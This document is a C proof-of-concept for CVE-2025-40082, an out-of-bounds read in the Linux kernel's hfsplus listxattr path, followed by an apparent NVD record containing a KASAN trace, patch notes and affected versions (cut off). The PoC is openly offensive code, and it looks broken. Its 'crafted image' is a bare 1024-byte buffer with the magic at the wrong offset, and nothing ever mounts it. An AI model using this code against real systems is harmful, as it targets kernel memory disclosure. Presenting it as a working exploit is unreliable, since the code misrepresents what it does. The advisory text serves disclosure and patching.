CVE-2025-40082

#include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <sys/xattr.h> #include <unistd.h> #include <sys/stat.h> #include <errno.h> /* * CVE-2025-40082 PoC - hfsplus slab-out-of-bounds read * Target: Linux kernel hfsplus filesystem driver * Trigger: listxattr on specially crafted hfsplus filesystem * * Note: This PoC requires a specially crafted hfsplus filesystem image * with malicious extended attributes to trigger the vulnerability. * The actual exploitation requires kernel debugging enabled (KASAN). */ #define HFSPLUS_MAGIC 0x482b #define TEST_FILE "/tmp/test_hfsplus.img" #define TEST_MOUNT "/mnt/hfsplus_test" int create_malicious_hfsplus_image(const char *image_path) { FILE *fp = fopen(image_path, "wb"); if (!fp) { fprintf(stderr, "Failed to create image: %s\n", strerror(errno)); return -1; } /* HFS+ volume header with crafted attributes */ unsigned char header[1024] = {0}; /* Set HFS+ magic number */ header[0] = 0x48; /* 'H' */ header[1] = 0x2B; /* '+' */ header[2] = 0x00; header[3] = 0x00; /* Craft malicious unicode string length in extended attributes */ /* This triggers the slab-out-of-bounds read in hfsplus_uni2asc */ unsigned short *attr_len = (unsigned short *)&header[512]; *attr_len = 0xFFFF; /* Large length exceeding allocated buffer */ fwrite(header, sizeof(header), 1, fp); fclose(fp); return 0; } int trigger_vulnerability(const char *mount_point) { char xattr_buffer[4096]; ssize_t ret; /* Create a file with malicious extended attribute */ char test_file[256]; snprintf(test_file, sizeof(test_file), "%s/test_file", mount_point); int fd = open(test_file, O_RDONLY); if (fd < 0) { fprintf(stderr, "Failed to open test file: %s\n", strerror(errno)); return -1; } /* Trigger listxattr which calls hfsplus_listxattr -> hfsplus_uni2asc */ ret = listxattr(test_file, xattr_buffer, sizeof(xattr_buffer)); if (ret < 0) { fprintf(stderr, "listxattr failed: %s\n", strerror(errno)); close(fd); return -1; } printf("listxattr returned: %zd bytes\n", ret); close(fd); return 0; } int main(int argc, char *argv[]) { printf("CVE-2025-40082 PoC - hfsplus slab-out-of-bounds read\n"); printf("=================================================\n\n"); /* This PoC demonstrates the vulnerability trigger mechanism */ /* Actual exploitation requires: */ /* 1. Creating a malicious hfsplus filesystem image */ /* 2. Mounting the image on a vulnerable system */ /* 3. Calling listxattr on files with crafted extended attributes */ printf("Vulnerability Details:\n"); printf("- Function: hfsplus_uni2asc() in fs/hfsplus/unicode.c:186\n"); printf("- Bug: slab-out-of-bounds read (KASAN detected)\n"); printf("- Trigger: listxattr() system call\n"); printf("- Impact: Read kernel heap memory beyond allocated buffer\n\n"); printf("To reproduce:\n"); printf("1. Create a hfsplus filesystem image with malicious xattrs\n"); printf("2. Mount the image on vulnerable kernel\n"); printf("3. Call listxattr on files to trigger OOB read\n"); printf("4. Check dmesg for KASAN report\n\n"); /* For demonstration, show the vulnerable code path */ printf("Vulnerable Code Path:\n"); printf("listxattr() -> path_listxattrat() -> vfs_listxattr()\n"); printf(" -> hfsplus_listxattr() -> hfsplus_uni2asc() [OOB READ]\n"); return 0; }

{"cve": {"id": "CVE-2025-40082", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-28T12:15:42.840", "lastModified": "2026-02-26T15:51:15.730", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nhfsplus: fix slab-out-of-bounds read in hfsplus_uni2asc()\n\nBUG: KASAN: slab-out-of-bounds in hfsplus_uni2asc+0xa71/0xb90 fs/hfsplus/unicode.c:186\nRead of size 2 at addr ffff8880289ef218 by task syz.6.248/14290\n\nCPU: 0 UID: 0 PID: 14290 Comm: syz.6.248 Not tainted 6.16.4 #1 PREEMPT(full)\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014\nCall Trace:\n <TASK>\n __dump_stack lib/dump_stack.c:94 [inline]\n dump_stack_lvl+0x116/0x1b0 lib/dump_stack.c:120\n print_address_description mm/kasan/report.c:378 [inline]\n print_report+0xca/0x5f0 mm/kasan/report.c:482\n kasan_report+0xca/0x100 mm/kasan/report.c:595\n hfsplus_uni2asc+0xa71/0xb90 fs/hfsplus/unicode.c:186\n hfsplus_listxattr+0x5b6/0xbd0 fs/hfsplus/xattr.c:738\n vfs_listxattr+0xbe/0x140 fs/xattr.c:493\n listxattr+0xee/0x190 fs/xattr.c:924\n filename_listxattr fs/xattr.c:958 [inline]\n path_listxattrat+0x143/0x360 fs/xattr.c:988\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xcb/0x4c0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\nRIP: 0033:0x7fe0e9fae16d\nCode: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 a8 ff ff ff f7 d8 64 89 01 48\nRSP: 002b:00007fe0eae67f98 EFLAGS: 00000246 ORIG_RAX: 00000000000000c3\nRAX: ffffffffffffffda RBX: 00007fe0ea205fa0 RCX: 00007fe0e9fae16d\nRDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000200000000000\nRBP: 00007fe0ea0480f0 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000\nR13: 00007fe0ea206038 R14: 00007fe0ea205fa0 R15: 00007fe0eae48000\n </TASK>\n\nAllocated by task 14290:\n kasan_save_stack+0x24/0x50 mm/kasan/common.c:47\n kasan_save_track+0x14/0x30 mm/kasan/common.c:68\n poison_kmalloc_redzone mm/kasan/common.c:377 [inline]\n __kasan_kmalloc+0xaa/0xb0 mm/kasan/common.c:394\n kasan_kmalloc include/linux/kasan.h:260 [inline]\n __do_kmalloc_node mm/slub.c:4333 [inline]\n __kmalloc_noprof+0x219/0x540 mm/slub.c:4345\n kmalloc_noprof include/linux/slab.h:909 [inline]\n hfsplus_find_init+0x95/0x1f0 fs/hfsplus/bfind.c:21\n hfsplus_listxattr+0x331/0xbd0 fs/hfsplus/xattr.c:697\n vfs_listxattr+0xbe/0x140 fs/xattr.c:493\n listxattr+0xee/0x190 fs/xattr.c:924\n filename_listxattr fs/xattr.c:958 [inline]\n path_listxattrat+0x143/0x360 fs/xattr.c:988\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xcb/0x4c0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nWhen hfsplus_uni2asc is called from hfsplus_listxattr,\nit actually passes in a struct hfsplus_attr_unistr*.\nThe size of the corresponding structure is different from that of hfsplus_unistr,\nso the previous fix (94458781aee6) is insufficient.\nThe pointer on the unicode buffer is still going beyond the allocated memory.\n\nThis patch introduces two warpper functions hfsplus_uni2asc_xattr_str and\nhfsplus_uni2asc_str to process two unicode buffers,\nstruct hfsplus_attr_unistr* and struct hfsplus_unistr* respectively.\nWhen ustrlen value is bigger than the allocated memory size,\nthe ustrlen value is limited to an safe size."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.4.297", "versionEndExcluding": "5.5", "matchCriteriaId": "6A4268E9-3297-43A5-98D3-25B38D611EF5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.10.241", "versionEndExcluding": "5.11", "matchCriteriaId": "FC16C741-04D3-418A-87C6-8EE23F15B67C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.15.190", "versionEndExcluding": "5.15.200", "matchCriteriaId": "BACB26C0-32A3-431C-8C20-05421E919125"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1.149", "versionEndEx ... (truncated)